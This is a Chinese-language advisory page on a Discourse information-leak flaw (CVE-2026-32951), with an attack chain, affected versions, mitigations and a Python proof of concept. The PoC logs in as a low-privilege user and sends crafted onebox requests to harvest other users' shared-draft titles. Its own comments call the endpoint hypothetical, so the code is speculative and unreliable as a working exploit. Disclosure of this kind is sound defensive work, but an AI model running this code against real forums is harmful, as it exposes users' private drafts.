CVE-2026-32951 CVSS 4.3 中危

CVE-2026-32951 Discourse 信息泄露漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32951

漏洞类型

信息泄露

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Discourse

漏洞概述

Discourse 是一款广泛使用的开源讨论平台。在受影响版本中，系统存在一处信息泄露漏洞。经过身份验证的攻击者可以通过构造特定的内联 onebox 请求，利用 category_id 参数匹配共享草稿类别，从而获取其他用户的共享草稿主题标题。该漏洞可能导致敏感信息意外暴露，官方已在后续版本中完成了修复。

技术细节

该漏洞的核心在于 Discourse 处理 inline onebox 请求时的权限校验逻辑存在缺陷。具体而言，当用户在编辑器中输入 URL 并触发预览功能时，系统后端会发起 onebox 请求以获取页面元数据。攻击者可以构造恶意请求，在参数中包含特定的 `category_id`，该 ID 对应系统内部的“共享草稿”类别。由于受影响版本在处理此类请求时，未充分验证当前用户对该特定分类的读取权限，导致服务器错误地将属于该分类下的草稿主题标题返回给攻击者。这种利用方式绕过了正常的访问控制列表（ACL），使得低权限用户能够嗅探到其他用户未发布的草稿信息。攻击者无需进行复杂的代码注入，仅需通过简单的网络请求即可遍历并获取敏感标题，造成信息泄露。

攻击链分析

STEP 1

1. 信息收集

攻击者注册或获取一个低权限账号，并确认目标站点使用受影响版本的 Discourse。

STEP 2

2. 身份认证

攻击者使用合法凭证登录系统，获取有效的会话 Cookie。

STEP 3

3. 漏洞利用

攻击者构造发送 inline onebox 请求，在请求参数中设置 category_id 为共享草稿类别的 ID。

STEP 4

4. 数据获取

解析服务器响应，提取返回的共享草稿主题标题，从而获取未公开的信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://discourse-instance.com"
login_url = f"{target_url}/session"
# Hypothetical endpoint based on vulnerability description
onebox_endpoint = f"{target_url}/onebox" 

# User credentials (Low privilege user)
username = "attacker"
password = "password"

session = requests.Session()

# 1. Authenticate to the application
login_payload = {
    "login": username,
    "password": password
}
# Note: Actual implementation might require CSRF tokens
login_resp = session.post(login_url, data=login_payload)
if login_resp.status_code != 200:
    print("Login failed")
    exit()

# 2. Exploit: Send inline onebox request with the vulnerable category_id
# The attacker needs to know or guess the ID of the shared drafts category
shared_draft_category_id = "<SHARED_DRAFT_CATEGORY_ID>"

exploit_params = {
    "url": "https://example.com", # Valid URL to trigger onebox generation
    "category_id": shared_draft_category_id # The vulnerable parameter
}

print(f"Sending request to {onebox_endpoint} with params: {exploit_params}")

response = session.get(onebox_endpoint, params=exploit_params)

# 3. Analyze response for leaked draft titles
if response.status_code == 200:
    print("[+] Request successful. Check response content for leaked draft titles:")
    print(response.text)
else:
    print("[-] Exploit request failed or endpoint not found.")

影响范围

Discourse 2026.1.0 至 2026.1.2

Discourse 2026.2.0 至 2026.2.1

Discourse 2026.3.0 (latest)

防御指南

临时缓解措施

建议管理员立即检查 Discourse 版本，若在受影响范围内，应尽快应用官方补丁进行升级。在无法立即升级的情况下，可以考虑临时限制普通用户对“共享草稿”功能的访问，或者通过反向代理规则拦截包含特定 category_id 参数的 onebox 请求，以降低泄露风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表